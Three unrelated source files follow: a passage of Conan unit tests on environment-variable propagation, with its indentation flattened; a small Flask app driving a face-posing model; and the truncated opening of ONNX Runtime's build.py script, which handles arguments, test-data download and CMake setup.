self.assertIn('var2="value3":"value2"${var2+:$var2}', environment_contents)
self.assertIn('CPPFLAGS="OtherFlag=2 MYCPPFLAG=1 ${CPPFLAGS+ $CPPFLAGS}"',
environment_contents)
self.assertIn("Another value", environment_contents)
if platform.system() == "Windows":
self.assertIn("PATH=/dir", environment_contents)
else:
self.assertIn("PATH=\"/dir\"", environment_contents)
if platform.system() == "Windows":
self.assertIn('var1=', deactivate_contents)
self.assertIn('var2=', deactivate_contents)
else:
self.assertIn('unset var1', deactivate_contents)
self.assertIn('unset var2', deactivate_contents)
def test_conan_info_cache_and_priority(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
class HelloConan(ConanFile):
name = "Hello"
version = "0.1"
def package_info(self):
self.env_info.VAR1="99"
'''
reuse = '''
import os
from conans import ConanFile
class Hello2Conan(ConanFile):
requires="Hello/0.1@lasote/stable"
def build(self):
self.output.info("VAR1=>%s" % os.environ.get("VAR1"))
'''
files = dict()
files["conanfile.py"] = conanfile
client.save(files)
client.run("export . lasote/stable")
files = dict()
files["conanfile.py"] = reuse
client.save(files)
client.run("install . --build missing")
client.run("build .")
self.assertIn("VAR1=>99", client.out)
        # Now specify a different value in the command line, but conaninfo already exists,
        # so you cannot override it from the command line without deleting the conaninfo.txt
client.run("install . -e VAR1=100 --build missing")
client.run("build .")
self.assertIn("VAR1=>100", client.out)
# Remove conaninfo
os.remove(os.path.join(client.current_folder, CONANINFO))
client.run("install . -e VAR1=100 --build missing")
client.run("build .")
self.assertIn("VAR1=>100", client.out)
# Now from a profile
os.remove(os.path.join(client.current_folder, CONANINFO))
client.save({"myprofile": "[env]\nVAR1=102"}, clean_first=False)
client.run("install . --profile ./myprofile --build missing")
client.run("build .")
self.assertIn("VAR1=>102", client.out)
def test_complex_deps_propagation(self):
client = TestClient()
self._export(client, "A", [], {"VAR1": "900", "VAR2": "23"})
self._export(client, "B1", ["A"], {"VAR1": "800", "VAR2": "24"})
self._export(client, "B2", ["A"], {"VAR1": "700", "VAR3": "22"})
self._export(client, "C", ["B1", "B2"], {})
client.save({"conanfile.py": reuse})
client.run("install . --build missing")
client.run("build .")
self.assertIn("VAR1=>800*", client.out)
self.assertIn("VAR2=>24*", client.out)
self.assertIn("VAR3=>22*", client.out)
def assertInSep(self, string, output):
string = string.replace(":", os.pathsep)
self.assertIn(string, output)
def replace_sep(self, string):
return string.replace(":", os.pathsep)
def test_complex_deps_propagation_append(self):
client = TestClient()
self._export(client, "A", [], {"VAR3": "-23"}, {"VAR1": "900", "VAR2": "23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {"VAR3": "45"}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing")
client.run("build .")
self.assertInSep("VAR1=>700:800:900*" % {"sep": os.pathsep}, client.out)
self.assertInSep("VAR2=>24:23*" % {"sep": os.pathsep}, client.out)
self.assertInSep("VAR3=>45*", client.out)
# Try other configuration
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {"VAR3": "23"}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing")
client.run("build .")
self.assertInSep("VAR1=>700:800:900*", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertInSep("VAR3=>23*", client.out)
# Try injecting some ENV in the install
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {"VAR3": "23"}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e VAR1=[override] -e VAR3=SIMPLE")
client.run("build .")
self.assertInSep("VAR1=>override:700:800:900", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertIn("VAR3=>SIMPLE*", client.out)
def test_override_simple(self):
client = TestClient()
# Try injecting some package level ENV in the install
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e LIB_A:VAR3=override")
client.run("build .")
self.assertInSep("VAR1=>700:800:900", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertIn("VAR3=>-23*", client.out)
def test_override_simple2(self):
client = TestClient()
# Try injecting some package level ENV in the install
self._export(client, "A", [], {"VAR3": "-23"}, {"VAR1": "900", "VAR2": "23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e VAR3=override")
self.assertIn("Building LIB_A, VAR1:None", client.out)
self.assertIn("Building LIB_A, VAR2:None", client.out)
self.assertIn("Building LIB_A, VAR3:override", client.out)
self.assertIn("Building LIB_B, VAR1:900", client.out)
self.assertIn("Building LIB_B, VAR2:23", client.out)
self.assertIn("Building LIB_B, VAR3:override", client.out)
self.assertIn("Building LIB_C, VAR1:800", client.out)
self.assertIn("Building LIB_C, VAR2:24", client.out)
self.assertIn("Building LIB_C, VAR3:override", client.out)
client.run("build .")
self.assertInSep("VAR1=>700:800:900", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertInSep("VAR3=>override*", client.out)
def test_complex_deps_propagation_override(self):
client = TestClient()
# Try injecting some package level ENV in the install, but without priority
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {"VAR3": "bestvalue"}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e LIB_B:VAR3=override")
self.assertIn("Building LIB_A, VAR1:None", client.out)
self.assertIn("Building LIB_A, VAR2:None", client.out)
self.assertIn("Building LIB_A, VAR3:None", client.out)
self.assertIn("Building LIB_B, VAR1:900", client.out)
self.assertIn("Building LIB_B, VAR2:23", client.out)
self.assertIn("Building LIB_B, VAR3:override", client.out)
self.assertIn("Building LIB_C, VAR1:800", client.out)
self.assertIn("Building LIB_C, VAR2:24", client.out)
self.assertIn("Building LIB_C, VAR3:-23", client.out)
client.run("build .")
self.assertInSep("VAR1=>700:800:900", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertInSep("VAR3=>bestvalue*", client.out)
def mix_path_case_test(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class LibConan(ConanFile):
name = "libB"
version = "1.0"
def package_info(self):
self.env_info.path = ["path_from_B"]
"""
client.save({"conanfile.py": conanfile})
client.run("create . user/channel")
conanfile = """
from conans import ConanFile
class LibConan(ConanFile):
name = "libA"
version = "1.0"
requires = "libB/1.0@user/channel"
def package_info(self):
self.env_info.PATH.extend(["path_from_A"])
"""
client.save({"conanfile.py": conanfile})
client.run("create . user/channel")
conanfile = """
[requires]
libA/1.0@user/channel
[generators]
virtualenv
"""
client.save({"conanfile.txt": conanfile}, clean_first=True)
client.run("install .")
info = client.load("conanbuildinfo.txt")
info = info.replace("\r\n", "\n")
self.assertIn("""
[ENV_libA]
PATH=["path_from_A"]
[ENV_libB]
PATH=["path_from_B"]""", info)
if platform.system() != "Windows":
activate = client.load("environment.sh.env")
self.assertIn('PATH="path_from_A":"path_from_B"${PATH+:$PATH}', activate)
else:
activate = client.load("environment.bat.env")
self.assertIn('PATH=path_from_A;path_from_B;%PATH%', activate)
def check_conaninfo_completion_test(self):
"""
consumer -> B -> C
-> D (conditional)
        The environment variables overridden by the consumer have to be reflected in B's conaninfo.txt
"""
client = TestClient()
conanfile = """
from conans import ConanFile
class LibConan(ConanFile):
name = "libC"
version = "1.0"
def package_info(self):
self.env_info.MYVAR = "ValueByLibC"
"""
client.save({"conanfile.py": conanfile})
client.run("export . foo/bar")
conanfile = """
from conans import ConanFile
class LibConan(ConanFile):
name = "libD"
version = "1.0"
def package_info(self):
self.env_info.MYVAR = "ValueByLibD"
"""
client.save({"conanfile.py": conanfile})
client.run("export . foo/bar")
conanfile = """
import os
from conans import ConanFile
class LibConan(ConanFile):
name = "libB"
version = "1.0"
def requirements(self):
if os.environ.get("DEP", None) == "C":
self.requires.add("libC/1.0@foo/bar")
else:
self.requires.add("libD/1.0@foo/bar")
def build_info(self):
self.output.warn("Value of MYVAR: %s" % os.environ["MYVAR"])
"""
client.save({"conanfile.py": conanfile})
client.run("export . foo/bar")
pref = PackageReference.loads("libB/1.0@foo/bar:5fecb9aaf431791c8c06ab146f3451823f982bb8")
# With no overrides, B takes dependency D and the value should be ValueByLibD
client.run("install libB/1.0@foo/bar --build")
self.assertTrue("Value of MYVAR: ValueByLibD")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n\n")) # Not user input env
# B takes dependency C and the value should be ValueByLibC
client.run("install libB/1.0@foo/bar --build -e DEP=C")
self.assertTrue("Value of MYVAR: ValueByLibC")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n\n")) # Not user input env
# Consumer overrides MYVAR, so his conaninfo should have it
client.run("install libB/1.0@foo/bar --build -e MYVAR=ValueByConsumer")
self.assertTrue("Value of MYVAR: ValueByConsumer")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n MYVAR=ValueByConsumer\n"))
# Consumer overrides MYVAR, so his conaninfo should have it, but not the libC, because
# is not a dependency
client.run("install libB/1.0@foo/bar --build -e libB:MYVAR=ValueByConsumer "
"-e libC:MYVAR=OtherValue")
self.assertTrue("Value of MYVAR: ValueByConsumer")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n libB:MYVAR=ValueByConsumer\n"))
# Consumer overrides MYVAR, so his conaninfo should have it, both libB and libD
client.run("install libB/1.0@foo/bar --build -e libB:MYVAR=ValueByConsumer "
"-e libD:MYVAR=OtherValue")
self.assertTrue("Value of MYVAR: ValueByConsumer")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n libB:MYVAR=ValueByConsumer\n"
" libD:MYVAR=OtherValue\n")) # Not user input env
def test_conaninfo_filtered(self):
client = TestClient()
# Try injecting some package level ENV in the install, but without priority
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "B2", ["A"], {}, {"VAR1": "800_2", "VAR2": "24_2"})
self._export(client, "C", ["B", "B2"], {"VAR3": "bestvalue"}, {"VAR1": "700"})
def load_conaninfo(lib):
# Read the LIB_A conaninfo
packages_path = client.cache.package_layout(ConanFileReference.loads("LIB_%s/1.0@lasote/stable" % lib)).packages()
package_path = os.path.join(packages_path, os.listdir(packages_path)[0])
info = ConanInfo.loads(load(os.path.join(package_path, CONANINFO)))
return info
# Test "A" conaninfo, should filter the FAKE_LIB
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e LIB_A:VAR3=override "
"-e GLOBAL=99 -e FAKE_LIB:VAR1=-90 -e LIB_B:VAR2=222 "
"-e LIB_B2:NEWVAR=VALUE -e VAR3=[newappend]")
info = load_conaninfo("A")
self.assertEqual(info.env_values.env_dicts("LIB_A"),
({"VAR3": "override", "GLOBAL": "99"}, {}))
self.assertEqual(info.env_values.env_dicts(""),
({'GLOBAL': '99'}, {'VAR3': ['newappend']}))
info = load_conaninfo("B")
self.assertEqual(info.env_values.env_dicts("LIB_A"), ({'GLOBAL': '99', 'VAR3': "override"},
{}))
self.assertEqual(info.env_values.env_dicts("LIB_B"), ({'GLOBAL': '99', "VAR2": "222"},
{'VAR3': ['newappend']}))
info = load_conaninfo("B2")
self.assertEqual(info.env_values.env_dicts("LIB_A"), ({'GLOBAL': '99', 'VAR3': 'override'},
{}))
self.assertEqual(info.env_values.env_dicts("LIB_B2"), ({'GLOBAL': '99', 'NEWVAR': "VALUE"},
{'VAR3': ['newappend']}))
info = load_conaninfo("C")
self.assertEqual(info.env_values.env_dicts("LIB_B2"), ({'GLOBAL': '99', 'NEWVAR': "VALUE"},
{'VAR3': ['newappend']}))
self.assertEqual(info.env_values.env_dicts("LIB_C"), ({'GLOBAL': '99'},
{'VAR3': ['newappend']}))
# Now check the info for the project
info = ConanInfo.loads(load(os.path.join(client.current_folder, CONANINFO)))
self.assertEqual(info.env_values.env_dicts("PROJECT"), ({'GLOBAL': '99'},
{'VAR3': ['newappend']}))
_, _, buildinfo = TXTGenerator.loads(load(os.path.join(client.current_folder, BUILD_INFO)))
self.assertEqual(buildinfo["LIB_A"].VAR1, ["900"])
def _export(self, client, name, requires, env_vars, env_vars_append=None):
hello_file = """
import os
from conans import ConanFile
class HelloLib%sConan(ConanFile):
name = "LIB_%s"
version = "1.0"
""" % (name, name)
if requires:
hello_file += "\n requires="
hello_file += ", ".join('"LIB_%s/1.0@lasote/stable"' % require for require in requires)
hello_file += """
def package_info(self):
pass
"""
if env_vars:
hello_file += """
%s
""" % "\n ".join(["self.env_info.%s = '%s'" % (name, value)
for name, value in env_vars.items()])
if env_vars_append:
hello_file += """
%s
""" % "\n ".join(["self.env_info.%s.append('%s')" % (name, value)
for name, value in env_vars_append.items()])
hello_file += """
def build(self):
self.output.info("Building %s, VAR1:%s*" % (self.name, os.environ.get("VAR1", None)))
self.output.info("Building %s, VAR2:%s*" % (self.name, os.environ.get("VAR2", None)))
self.output.info("Building %s, VAR3:%s*" % (self.name, os.environ.get("VAR3", None)))
"""
client.save({"conanfile.py": hello_file}, clean_first=True)
client.run("export . lasote/stable")
reuse = '''
import os
from conans import ConanFile
class Hello2Conan(ConanFile):
requires="LIB_C/1.0@lasote/stable"
def build(self):
self.output.info("VAR1=>%s*" % os.environ.get("VAR1"))
self.output.info("VAR2=>%s*" % os.environ.get("VAR2"))
self.output.info("VAR3=>%s*" % os.environ.get("VAR3"))
'''
|
the-stack_106_12938
|
import torch
from manual_poser import ManualPoserApp
from poser.morph_rotate_combine_poser import MorphRotateCombinePoser256Param6
from tha.combiner import CombinerSpec
from tha.face_morpher import FaceMorpherSpec
from tha.two_algo_face_rotator import TwoAlgoFaceRotatorSpec
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/', methods=['POST', 'GET'])
def pose():
cuda = torch.device('cuda')
poser = MorphRotateCombinePoser256Param6(
morph_module_spec=FaceMorpherSpec(),
morph_module_file_name="data/face_morpher.pt",
rotate_module_spec=TwoAlgoFaceRotatorSpec(),
rotate_module_file_name="data/two_algo_face_rotator.pt",
combine_module_spec=CombinerSpec(),
combine_module_file_name="data/combiner.pt",
device=cuda)
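    # Note: the poser (and the three model files above) is rebuilt on every request here;
    # caching it at module level would be one way to avoid reloading the weights per call.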
if request.method == 'POST':
start_x = request.form.get('start_x')
start_y = request.form.get('start_y')
start_z = request.form.get('start_z')
start_left_eye = request.form.get('start_left_eye')
start_right_eye = request.form.get('start_right_eye')
start_mouth = request.form.get('start_mouth')
end_x = request.form.get('end_x')
end_y = request.form.get('end_y')
end_z = request.form.get('end_z')
end_left_eye = request.form.get('end_left_eye')
end_right_eye = request.form.get('end_right_eye')
end_mouth = request.form.get('end_mouth')
total_frame_number = request.form.get('total_frame_number')
startPose = [float(start_x), float(start_y), float(start_z), float(start_left_eye), float(start_right_eye),
float(start_mouth)]
endPose = [float(end_x), float(end_y), float(end_z), float(end_left_eye), float(end_right_eye),
float(end_mouth)]
if request.method == 'GET':
startPose = [-1.0, -1.0, -1.0, 0, 0, 0]
endPose = [1.0, 1.0, 1.0, 1, 1, 1]
total_frame_number = 24
ManualPoserApp(poser=poser, torch_device=cuda).main_loop(startPose, endPose, int(total_frame_number))
return render_template('index.html')
if __name__ == '__main__':
    app.run(debug=True)
|
the-stack_106_12943
|
#!/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import argparse
import fileinput
import getpass
import glob
import logging
import multiprocessing
import os
import platform
import re
import shutil
import subprocess
import sys
import warnings
import hashlib
from os.path import expanduser
logging.basicConfig(format="%(asctime)s %(name)s [%(levelname)s] - %(message)s", level=logging.DEBUG)
log = logging.getLogger("Build")
class BaseError(Exception):
"""Base class for errors originating from build.py."""
pass
class BuildError(BaseError):
"""Error from running build steps."""
def __init__(self, *messages):
super().__init__("\n".join(messages))
class UsageError(BaseError):
"""Usage related error."""
def __init__(self, message):
super().__init__(message)
def parse_arguments():
parser = argparse.ArgumentParser(description="ONNXRuntime CI build driver.",
usage='''
Default behavior is --update --build --test for native architecture builds.
Default behavior is --update --build for cross-compiled builds.
The Update phase will update git submodules, and run cmake to generate makefiles.
The Build phase will build all projects.
The Test phase will run all unit tests, and optionally the ONNX tests.
Use the individual flags to only run the specified stages.
''')
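    # Illustrative invocations (paths and values are placeholders):
    #   python build.py --build_dir build --config Release --parallel --build_shared_lib
    #   python build.py --build_dir build --use_cuda --cuda_home /usr/local/cuda --cudnn_home /usr/local/cudnn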
# Main arguments
parser.add_argument("--build_dir", required=True, help="Path to the build directory.")
parser.add_argument("--config", nargs="+", default=["Debug"],
choices=["Debug", "MinSizeRel", "Release", "RelWithDebInfo"],
help="Configuration(s) to build.")
parser.add_argument("--update", action='store_true', help="Update makefiles.")
parser.add_argument("--build", action='store_true', help="Build.")
parser.add_argument("--clean", action='store_true', help="Run 'cmake --build --target clean' for the selected config/s.")
parser.add_argument("--parallel", action='store_true', help='''Use parallel build.
The build setup doesn't get all dependencies right, so --parallel only works if you're just rebuilding ONNXRuntime code.
If you've done an update that fetched external dependencies you have to build without --parallel the first time.
Once that's done, run with "--build --parallel --test" to just build in parallel and run tests.''')
parser.add_argument("--test", action='store_true', help="Run unit tests.")
# enable ONNX tests
parser.add_argument("--enable_onnx_tests", action='store_true',
                        help='''When running the Test phase, run onnx_test_runner against available test data directories.''')
parser.add_argument("--path_to_protoc_exe", help="Path to protoc exe. ")
parser.add_argument("--download_test_data", action="store_true",
help='''Downloads test data without running the tests''')
parser.add_argument("--test_data_url", help="Test data URL.")
parser.add_argument("--test_data_checksum", help="Test data checksum (MD5 digest).")
    # generate documentation
parser.add_argument("--gen_doc", action='store_true', help="Generate documentation on contrib ops")
# CUDA related
parser.add_argument("--use_cuda", action='store_true', help="Enable CUDA.")
parser.add_argument("--cuda_version", help="The version of CUDA toolkit to use. Auto-detect if not specified. e.g. 9.0")
parser.add_argument("--cuda_home", help="Path to CUDA home."
"Read from CUDA_HOME environment variable if --use_cuda is true and --cuda_home is not specified.")
parser.add_argument("--cudnn_home", help="Path to CUDNN home. "
"Read from CUDNN_HOME environment variable if --use_cuda is true and --cudnn_home is not specified.")
# Python bindings
parser.add_argument("--enable_pybind", action='store_true', help="Enable Python Bindings.")
parser.add_argument("--build_wheel", action='store_true', help="Build Python Wheel. ")
parser.add_argument("--numpy_version", help="Installs a specific version of numpy "
"before building the python binding.")
parser.add_argument("--skip-keras-test", action='store_true', help="Skip tests with Keras if keras is installed")
# C-Sharp bindings
parser.add_argument("--build_csharp", action='store_true', help="Build C#.Net DLL and NuGet package")
# Build a shared lib
parser.add_argument("--build_shared_lib", action='store_true', help="Build a shared library for the ONNXRuntime.")
# Build ONNX Runtime server
parser.add_argument("--build_server", action='store_true', help="Build server application for the ONNXRuntime.")
parser.add_argument("--enable_server_tests", action='store_true', help="Run server application tests.")
parser.add_argument("--enable_server_model_tests", action='store_true', help="Run server model tests.")
# Build options
parser.add_argument("--cmake_extra_defines", nargs="+",
help="Extra definitions to pass to CMake during build system generation. " +
"These are just CMake -D options without the leading -D.")
parser.add_argument("--x86", action='store_true',
help="Create x86 makefiles. Requires --update and no existing cache CMake setup. Delete CMakeCache.txt if needed")
parser.add_argument("--arm", action='store_true',
help="Create ARM makefiles. Requires --update and no existing cache CMake setup. Delete CMakeCache.txt if needed")
parser.add_argument("--arm64", action='store_true',
help="Create ARM64 makefiles. Requires --update and no existing cache CMake setup. Delete CMakeCache.txt if needed")
parser.add_argument("--msvc_toolset", help="MSVC toolset to use. e.g. 14.11")
parser.add_argument("--android", action='store_true', help='Build for Android')
parser.add_argument("--android_abi", type=str, default='arm64-v8a',
                        help='Android ABI, e.g. arm64-v8a')
parser.add_argument("--android_api", type=int, default=27,
help='Android API Level, e.g. 21')
parser.add_argument("--android_ndk_path", default="", help="Path to the Android NDK")
# Arguments needed by CI
parser.add_argument("--cmake_path", default="cmake", help="Path to the CMake program.")
parser.add_argument("--ctest_path", default="ctest", help="Path to the CTest program.")
parser.add_argument("--skip_submodule_sync", action='store_true', help="Don't do a 'git submodule update'. Makes the Update phase faster.")
parser.add_argument("--use_jemalloc", action='store_true', help="Use jemalloc.")
parser.add_argument("--use_openblas", action='store_true', help="Build with OpenBLAS.")
parser.add_argument("--use_mkldnn", action='store_true', help="Build with MKLDNN.")
parser.add_argument("--use_mklml", action='store_true', help="Build with MKLML.")
parser.add_argument("--use_gemmlowp", action='store_true', help="Build with gemmlowp for quantized gemm.")
parser.add_argument("--use_automl", action='store_true', help="Build with AutoML support.")
parser.add_argument("--use_ngraph", action='store_true', help="Build with nGraph.")
parser.add_argument("--use_openvino", nargs="?", const="CPU_FP32",
choices=["CPU_FP32","GPU_FP32","GPU_FP16","VAD-M_FP16","MYRIAD_FP16"], help="Build with OpenVINO for specific hardware.")
parser.add_argument("--use_dnnlibrary", action='store_true', help="Build with DNNLibrary.")
parser.add_argument("--use_nsync", action='store_true', help="Build with NSYNC.")
parser.add_argument("--use_preinstalled_eigen", action='store_true', help="Use pre-installed eigen.")
parser.add_argument("--eigen_path", help="Path to pre-installed eigen.")
parser.add_argument("--use_tvm", action="store_true", help="Build with tvm")
parser.add_argument("--use_openmp", action='store_true', help="Build with OpenMP.")
parser.add_argument("--use_llvm", action="store_true", help="Build tvm with llvm")
parser.add_argument("--use_eigenthreadpool", action="store_true", help="Build with eigenthreadpool")
parser.add_argument("--enable_msinternal", action="store_true", help="Enable for Microsoft internal builds only.")
parser.add_argument("--llvm_path", help="Path to llvm dir")
parser.add_argument("--azure_sas_key", help="Azure storage sas key, starts with '?'")
parser.add_argument("--use_brainslice", action="store_true", help="Build with brain slice")
parser.add_argument("--brain_slice_package_path", help="Path to brain slice packages")
parser.add_argument("--brain_slice_package_name", help="Name of brain slice packages")
parser.add_argument("--brain_slice_client_package_name", help="Name of brainslice client package")
parser.add_argument("--use_nuphar", action='store_true', help="Build with nuphar")
parser.add_argument("--use_tensorrt", action='store_true', help="Build with TensorRT")
parser.add_argument("--tensorrt_home", help="Path to TensorRT installation dir")
parser.add_argument("--use_full_protobuf", action='store_true', help="Use the full protobuf library")
parser.add_argument("--disable_contrib_ops", action='store_true', help="Disable contrib ops (reduces binary size)")
parser.add_argument("--skip_onnx_tests", action='store_true', help="Explicitly disable all onnx related tests")
parser.add_argument("--enable_msvc_static_runtime", action='store_true', help="Enable static linking of MSVC runtimes.")
parser.add_argument("--enable_language_interop_ops", action='store_true', help="Enable operator implemented in language other than cpp")
parser.add_argument("--cmake_generator", choices=['Visual Studio 15 2017', 'Visual Studio 16 2019'],
default='Visual Studio 15 2017', help="Specify the generator that CMake invokes. This is only supported on Windows")
return parser.parse_args()
def resolve_executable_path(command_or_path):
"""Returns the absolute path of an executable."""
executable_path = shutil.which(command_or_path)
if executable_path is None:
raise BuildError("Failed to resolve executable path for '{}'.".format(command_or_path))
return os.path.realpath(executable_path)
def is_windows():
return sys.platform.startswith("win")
def is_ubuntu_1604():
return platform.linux_distribution()[0] == 'Ubuntu' and platform.linux_distribution()[1] == '16.04'
def get_config_build_dir(build_dir, config):
# build directory per configuration
return os.path.join(build_dir, config)
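# For example, get_config_build_dir("build", "RelWithDebInfo") returns "build/RelWithDebInfo"
# on POSIX (backslash-separated on Windows).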
def run_subprocess(args, cwd=None, capture=False, dll_path=None, shell=False, env={}):
log.debug("Running subprocess in '{0}'\n{1}".format(cwd or os.getcwd(), args))
my_env = os.environ.copy()
if dll_path:
if is_windows():
my_env["PATH"] = dll_path + os.pathsep + my_env["PATH"]
else:
if "LD_LIBRARY_PATH" in my_env:
my_env["LD_LIBRARY_PATH"] += os.pathsep + dll_path
else:
my_env["LD_LIBRARY_PATH"] = dll_path
stdout, stderr = (subprocess.PIPE, subprocess.STDOUT) if capture else (None, None)
my_env.update(env)
return subprocess.run(args, cwd=cwd, check=True, stdout=stdout, stderr=stderr, env=my_env, shell=shell)
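# Illustrative call (not from the original script):
#   run_subprocess([sys.executable, "--version"], capture=True).stdout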
def update_submodules(source_dir):
run_subprocess(["git", "submodule", "sync", "--recursive"], cwd=source_dir)
run_subprocess(["git", "submodule", "update", "--init", "--recursive"], cwd=source_dir)
def is_docker():
path = '/proc/self/cgroup'
return (
os.path.exists('/.dockerenv') or
os.path.isfile(path) and any('docker' in line for line in open(path))
)
def is_sudo():
return 'SUDO_UID' in os.environ.keys()
def install_apt_package(package):
have = package in str(run_subprocess(["apt", "list", "--installed", package], capture=True).stdout)
if not have:
if is_sudo():
run_subprocess(['apt-get', 'install', '-y', package])
else:
raise BuildError(package + " APT package missing. Please re-run this script using sudo to install.")
def install_ubuntu_deps(args):
'Check if the necessary Ubuntu dependencies are installed. Not required on docker. Provide help output if missing.'
# check we need the packages first
if not (args.enable_pybind or args.use_openblas):
return
# not needed on docker as packages are pre-installed
if not is_docker():
try:
if args.enable_pybind:
install_apt_package("python3")
if args.use_openblas:
install_apt_package("libopenblas-dev")
except Exception as e:
raise BuildError("Error setting up required APT packages. {}".format(str(e)))
def install_python_deps(numpy_version=""):
dep_packages = ['setuptools', 'wheel', 'pytest']
dep_packages.append('numpy=={}'.format(numpy_version) if numpy_version else 'numpy>=1.15.0')
dep_packages.append('sympy>=1.1')
dep_packages.append('packaging')
run_subprocess([sys.executable, '-m', 'pip', 'install', '--trusted-host', 'files.pythonhosted.org'] + dep_packages)
def check_md5(filename, expected_md5):
if not os.path.exists(filename):
return False
hash_md5 = hashlib.md5()
BLOCKSIZE = 1024*64
with open(filename, "rb") as f:
buf = f.read(BLOCKSIZE)
while len(buf) > 0:
hash_md5.update(buf)
buf = f.read(BLOCKSIZE)
hex = hash_md5.hexdigest()
if hex != expected_md5:
log.info('md5 mismatch, expect %s, got %s' % (expected_md5, hex))
os.remove(filename)
return False
return True
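# Example (the hash shown is the well-known MD5 of an empty file, for illustration only):
#   check_md5("empty.bin", "d41d8cd98f00b204e9800998ecf8427e")
# returns True only when the file exists and its MD5 matches; a mismatching file is deleted.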
#the last part of src_url should be unique, across all the builds
def download_test_data(build_dir, src_url, expected_md5, azure_sas_key):
cache_dir = os.path.join(expanduser("~"), '.cache','onnxruntime')
os.makedirs(cache_dir, exist_ok=True)
local_zip_file = os.path.join(cache_dir, os.path.basename(src_url))
if not check_md5(local_zip_file, expected_md5):
log.info("Downloading test data")
if azure_sas_key:
src_url += azure_sas_key
# try to avoid logging azure_sas_key
if shutil.which('aria2c'):
            result = subprocess.run(['aria2c', '-x', '5', '-j', '5', '-q', src_url, '-d', cache_dir])
if result.returncode != 0:
raise BuildError("aria2c exited with code {}.".format(result.returncode))
elif shutil.which('curl'):
result = subprocess.run(['curl', '-s', src_url, '-o', local_zip_file])
if result.returncode != 0:
raise BuildError("curl exited with code {}.".format(result.returncode))
else:
import urllib.request
import urllib.error
try:
urllib.request.urlretrieve(src_url, local_zip_file)
except urllib.error.URLError:
raise BuildError("urllib.request.urlretrieve() failed.")
models_dir = os.path.join(build_dir,'models')
if os.path.exists(models_dir):
log.info('deleting %s' % models_dir)
shutil.rmtree(models_dir)
if shutil.which('unzip'):
run_subprocess(['unzip','-qd', models_dir, local_zip_file])
elif shutil.which('7z'): # 7-Zip
run_subprocess(['7z','x', local_zip_file, '-y', '-o' + models_dir])
elif shutil.which('7za'): # 7-Zip standalone
run_subprocess(['7za', 'x', local_zip_file, '-y', '-o' + models_dir])
else:
#TODO: use python for unzip
log.error("No unzip tool for use")
return False
return True
def setup_test_data(build_dir, configs, test_data_url, test_data_checksum, azure_sas_key):
    """Sets up the test data, downloading it if needed."""
    if test_data_url is not None:
        if not download_test_data(build_dir, test_data_url, test_data_checksum, azure_sas_key):
raise BuildError("Failed to set up test data.")
# create a shortcut for test models if there is a 'models' folder in build_dir
if is_windows():
src_model_dir = os.path.join(build_dir, 'models')
for config in configs:
config_build_dir = get_config_build_dir(build_dir, config)
os.makedirs(config_build_dir, exist_ok=True)
dest_model_dir = os.path.join(config_build_dir, 'models')
if os.path.exists(src_model_dir) and not os.path.exists(dest_model_dir):
log.debug("creating shortcut %s -> %s" % (src_model_dir, dest_model_dir))
run_subprocess(['mklink', '/D', '/J', dest_model_dir, src_model_dir], shell=True)
def generate_build_tree(cmake_path, source_dir, build_dir, cuda_home, cudnn_home, tensorrt_home, path_to_protoc_exe, configs, cmake_extra_defines, args, cmake_extra_args):
log.info("Generating CMake build tree")
cmake_dir = os.path.join(source_dir, "cmake")
    # TODO: fix jemalloc build so it does not conflict with onnxruntime shared lib builds. (e.g. onnxruntime_pybind)
# for now, disable jemalloc if pybind is also enabled.
cmake_args = [cmake_path, cmake_dir,
"-Donnxruntime_RUN_ONNX_TESTS=" + ("ON" if args.enable_onnx_tests else "OFF"),
"-Donnxruntime_GENERATE_TEST_REPORTS=ON",
"-Donnxruntime_DEV_MODE=" + ("OFF" if args.android else "ON"),
"-DPYTHON_EXECUTABLE=" + sys.executable,
